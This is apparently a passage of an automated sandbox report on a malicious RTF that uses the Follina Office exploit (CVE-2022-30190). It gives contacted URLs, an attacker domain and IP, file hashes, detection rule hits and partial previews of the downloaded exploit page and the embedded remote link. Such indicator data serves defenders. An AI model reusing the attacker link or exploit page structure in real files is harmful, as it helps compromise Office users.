                                                                                                                                      https://clients.config.office.net/c2r/v1.0/InteractiveInstallation4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://graph.windows.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://api.powerbi.com/beta/myorg/imports4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://devnull.onenote.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://ncus.pagecontentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://messaging.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://augloop.office.com/v24EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://skyapi.live.net/Activity/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://clients.config.office.net/user/v1.0/mac4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            13.250.15.191
                                                                                                                                                            		cyberleague.coUnited States
                                                                                                                                                            		16509AMAZON-02UStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:639039
                                                                                                                                                            Start date and time: 03/06/202223:02:032022-06-03 23:02:03 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 5m 10s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:light
                                                                                                                                                            Sample file name:20220531_180800.rtf
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal72.expl.evad.winRTF@5/15@2/1
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:Failed
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .rtf
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.21, 52.109.76.34
                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            No simulations

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            No context

                                                                                                                                                            Domains

                                                                                                                                                            No context

                                                                                                                                                            ASNs

                                                                                                                                                            No context

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):528384
                                                                                                                                                            Entropy (8bit):0.47626507928862705
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:xGfXucJCIG8SFifZ0jGBwehKW8wtZ1IEj+hVZO4Fg:0fXnCZHOZmC18/EQI
                                                                                                                                                            MD5:521477A5B543DCDBDF650506A2BEF2FB
                                                                                                                                                            SHA1:7396544D2B6EB329AA33FE532F23ADDEE7B26C3C
                                                                                                                                                            SHA-256:BD9D10557EBF81AEEAE73A07771E9B212F8F574AA1814AE50CF135FD813DC71A
                                                                                                                                                            SHA-512:91B1F89180A11D9D0465CC39EE9A1333972C1AEA6B814862192322B16A44DF32DE2D997515367FC02036061728AB9AEA0D834EAE2C3B67A1E36815E2BF376077
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N-U.7...m.(...`.:{6^...Z.Cd..3..y[9.|*..|..... ..(..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36
                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):64
                                                                                                                                                            Entropy (8bit):1.3860360556164644
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:gdNSlNdaV:gG3u
                                                                                                                                                            MD5:705034BCC0EEF9FEDF492547A6248FDA
                                                                                                                                                            SHA1:582882F32AA3B4408443539B678D466383E7EBF7
                                                                                                                                                            SHA-256:19EC0E986BD9E829EE6FEB3FDFC5C52BBC0417294BF64EE33DF5D026E9C68F97
                                                                                                                                                            SHA-512:573B3B7328EB8875DDE1513A444D334CC07C1271766C064FCC396DCB337B1298888D23B0752CA1F927A2126AAAE6F1F3CD962E4E1BCCD4EE51C36DA7C0B064BB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:768287. Admin.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147863
                                                                                                                                                            Entropy (8bit):5.35893694438743
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:CcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:9HQ9DQW+zIXLI
                                                                                                                                                            MD5:CAD3616610DB963271F887DD70CC2E8F
                                                                                                                                                            SHA1:C24CC92A07D0846DD80F694620B9D17D765071F8
                                                                                                                                                            SHA-256:42F5BE14C77E0DDA5B870FFD88C8C03E9D43E6E630F125B1C2F1CE03CF98C9A6
                                                                                                                                                            SHA-512:E857B825E8592E7593CEF517BBE22514B873216664DA01980117B0E7580D0F70A0DC6D28FD009D7C84240E7EB403FE4AFA82FD87D942B9C5D84A3370C5DC9D90
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-03T21:03:08">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5092
                                                                                                                                                            Entropy (8bit):1.5689266993578892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                            MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                            SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                            SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                            SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ADFF182E.emf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4980
                                                                                                                                                            Entropy (8bit):3.8087894377622136
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cqZDMN7gsdBgLfVTped//HksYHGui3DAjG6kpJoApdHk/O:cqi7lBSTped//qH3i3DAqXLE/O
                                                                                                                                                            MD5:5B29927367C1C2BEBE25499E5602DE05
                                                                                                                                                            SHA1:10EB42142920A3299851F183D624731B910C6FCE
                                                                                                                                                            SHA-256:820E5CFE32DD64E31AEE40837BC3730B1B0F810787A7D3AAFC700191E6551C68
                                                                                                                                                            SHA-512:CD1E48056BDCBDD8CE2C0B7C8E15CA645D26FF372CA68D20D6B3078580943D4D5FA68FEE84A0C1AAC86F275ACE0059A3F76C2AF402EEC918C6680549BAB2C2EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:....l.............../................... EMF....t.......................p....... ...O................5..............................4...5...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EACEED93.jpeg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 750x500, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91933
                                                                                                                                                            Entropy (8bit):7.9892937833237845
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:7JCBhGCgBEFzvY1kH0R1ngxcrXo3N0rKL1nvFhbbrC3PJ4+6JaZB5:UBkCgBEZPml3rY3NBpvFRbAhOJi5
                                                                                                                                                            MD5:A53C5995856D35B0097F80E38D258D33
                                                                                                                                                            SHA1:31099B09DCCAC8C4A1BAA7E1F1B14E6C80FC516F
                                                                                                                                                            SHA-256:E87E50F77EEC96A1F0E37FCA345001474B3A023EAABC8DBE6FB1989DCFCDA543
                                                                                                                                                            SHA-512:92C0748B624D9C2C8941C7720EF34C7EF7793589C19517FA4AAAF40C5BE3DCDE3F7C601D1D2B142AED5EFA92E50E5B449B2A61AAB96D22FBBF2B2C9F0EEFA1F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......Exif..MM.*.............C....................................................................C............................................................................".................................................................................*....4.`B.,}...3..x....:..wx.2...G.8...Z...;a..Tv..a..du"..`...Z...Y..1....s.i.c<.7....Dj...V..}y.r.:.....1z.D...sg.;.c..S`1..\9.u%...X..nDC.L.Z..-..D=..29......1:....DN..l+..P.m.U.LY=.c...-....O....._w.Mj.v.A.;..v::.`l..C.......l.)....}q..D .h.h.9.U.[...(l.Da....^...c3~Y..c.#.7HC3{....PK.n.<"..L..S.^=..D..vL....<:.(....;..J..9...V...r.I........(/H...x..j]e...;.g.........t!.H.\b[.........{...bR...x..Q.Q..}..eW.GD..........]M...Xk"#.G...x..t...mZ.-M...v)SJ.w.c...1.Jl.&2y..om.$..%..i:u1...1.{{....FIN...N8...=.)...8.7a!.lJ...h.U....6j.D~.....8._Hr.bY>M.a..z............m.+..wc."A.>..q.....?=..m.....n.CR\R.Vc.=..s...H.. ......+F..F.j.j..I.....9I.<.:{.#;...mc.gF5Ga.2gB..g..&..'...`..6..s...!..u

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5092
                                                                                                                                                            Entropy (8bit):1.5689266993578892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                            MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                            SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                            SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                            SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Joe Security
                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1536
                                                                                                                                                            Entropy (8bit):1.312888549670333
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:W4ofylIcElClbYS7plQalvbK/SterHr4PxZUttrasD3B9d4XsDRv1:9oal7MClc2HK/rLGZmra4Bn4X6N
                                                                                                                                                            MD5:451EC25F416BC912608235442FF2F166
                                                                                                                                                            SHA1:F888C9778D1C7EBF3866D0C58500DB59171DCBB3
                                                                                                                                                            SHA-256:334A4E952D4B5D75EEB8A85978592B6DA7147803188641EECF69A7A4726E858A
                                                                                                                                                            SHA-512:2F871BFB230404A4718D1AB1C96DB79EB617DE4689B2B7957246F5E12143E1688C0CC54B81DF214818F31463D4FC33E4F23D104F7D65424B335867B824457F1D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..M.O.T.D.............L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.c.y.b.e.r.l.e.a.g.u.e...c.o./.t.h.1.s...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B65E71D2-803B-40A2-8E3C-9EA33F7B9F39}.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1024
                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5092
                                                                                                                                                            Entropy (8bit):1.5689266993578892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                            MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                            SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                            SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                            SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Joe Security
                                                                                                                                                            IE Cache URL:https://cyberleague.co/th1s.html
